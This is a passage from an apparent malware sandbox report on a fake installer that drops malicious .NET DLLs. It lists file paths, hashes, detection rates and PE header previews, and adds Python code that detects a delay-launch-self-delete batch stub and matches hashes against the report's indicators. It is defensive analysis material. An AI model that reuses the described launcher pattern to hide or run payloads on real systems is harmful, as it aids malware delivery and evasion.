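    return findings


def is_launcher_stub(lines: List[str]) -> bool:
    """The complete pattern: delay, detached launch and self-delete all present."""
    rules = {rule for rule, _ in scan_batch(lines)}
    return {"delay_before_launch", "detached_exe_launch", "temp_bat_self_delete"} <= rules


if __name__ == "__main__":
    batch_lines = lines_from_preview(BATCH_PREVIEW)
    for rule, evidence in scan_batch(batch_lines):
        print(f"{rule:24s} {evidence}")
    print("launcher stub:", is_launcher_stub(batch_lines))
```

On the report's batch file this yields all four rule hits and `is_launcher_stub` returns true. For hunting, the same three rules translate directly to process-creation telemetry: a `cmd.exe` child of a user-writable binary that spawns `w32tm.exe /stripchart`, then `start`s an `.exe` from a Program Files locale folder, then runs `del` on a `.bat` in `%TEMP%`.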
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1251, Revision Number: {FAF1FEAC-2FC7-4585-9A19-0ECE4CC93372}, Number of Words: 0, Subject: SandeLLo CHECKER, Author: LIMITED LIABILITY COMPANY "SANDELLO", Name of Creating Application: SandeLLo CHECKER, Template: ;1049, Comments: CS CheckCheat, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Apr 1 17:11:28 2024, Number of Pages: 200
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4085760
                                                                                                                      Entropy (8bit):6.581204593384424
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:WQ5+qotJCxKoibHCNbH4d5+u+Tx5KzEKrbsUT1wZK2Pfth1Yz5nsWIGvjlIlyX9H:otFHCNbHXjf1Y5GCaSqgEgv
                                                                                                                      MD5:E47C6582751CDC22D8C0EEAC60DE6D0B
                                                                                                                      SHA1:4C057D98754B09C95FCAE46162673D1B241CCEA4
                                                                                                                      SHA-256:C645A247C399AE2E8CCF8F826415E7287B52080FCAE3DAC203E7E543FE792CCB
                                                                                                                      SHA-512:2E2DC24E4CC1314F17506C0007F1E5C1200AF1A2B14820968E7A1019C29B60913701BEB5498A6C13E7CEF938E98EFA464B1CAE2F5A8CC59C493CAEBFD158DA5B
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89600
                                                                                                                      Entropy (8bit):5.905167202474779
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38400
                                                                                                                      Entropy (8bit):5.699005826018714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41472
                                                                                                                      Entropy (8bit):5.6808219961645605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64000
                                                                                                                      Entropy (8bit):5.857602289000348
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):294912
                                                                                                                      Entropy (8bit):6.010605469502259
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34816
                                                                                                                      Entropy (8bit):5.636032516496583
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.629584586954759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38400
                                                                                                                      Entropy (8bit):5.699005826018714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):50176
                                                                                                                      Entropy (8bit):5.723168999026349
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):294912
                                                                                                                      Entropy (8bit):6.010605469502259
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38912
                                                                                                                      Entropy (8bit):5.679286635687991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):70144
                                                                                                                      Entropy (8bit):5.909536568846014
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89600
                                                                                                                      Entropy (8bit):5.905167202474779
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):342528
                                                                                                                      Entropy (8bit):6.170134230759619
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38912
                                                                                                                      Entropy (8bit):5.679286635687991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
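The entries above list, for each dropped file, a size, an 8-bit entropy, four digests and a libmagic file type. Below is an added example (not part of the Joe Sandbox report and not code from the analysed sample) that recomputes those same fields for a local file, walks the PE header far enough to confirm the "PE32 ... (DLL) (console) ... Mono/.Net assembly" classification, and matches the file's SHA-256 against the values quoted in these entries. The `pe_info` walk also exposes the COFF TimeDateStamp, which is the four bytes shown after `PE..L...` in each Preview (for example `c..d` or `...g`; a high byte of `d`, 0x64, places a stamp in March to September 2023). The PE bytes built by `build_synthetic_dotnet_dll` are a constructed header-only image for testing, not a real dropped file.

```python
"""Recompute a sandbox report's per-file fields and match them against the report's IOCs.

Added example for this report; not Joe Sandbox code and not the sample's code.
"""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# SHA-256 values copied from the dropped-file entries in the report.
REPORT_SHA256 = {
    "32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B",
    "9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB",
    "25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625",
    "3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB",
    "3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864",
    "CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4",
    "6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F",
    "80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F",
    "2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669",
    "7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708",
}

IMAGE_FILE_DLL = 0x2000                  # COFF Characteristics flag -> "(DLL)"
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3          # optional-header Subsystem -> "(console)"
CLR_RUNTIME_HEADER_INDEX = 14            # data directory entry present only in .NET images


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0..8.0; the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """Upper-case hex digests, as the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_info(data: bytes):
    """Minimal PE header walk; returns None when the bytes are not a PE image.

    e_lfanew at 0x3C points at 'PE\\0\\0'; the 20-byte COFF header follows
    (Machine, NumberOfSections, TimeDateStamp, ..., SizeOfOptionalHeader,
    Characteristics); then the optional header, whose Magic distinguishes
    PE32 (0x10B) from PE32+ (0x20B). Subsystem sits at +68 in both. The data
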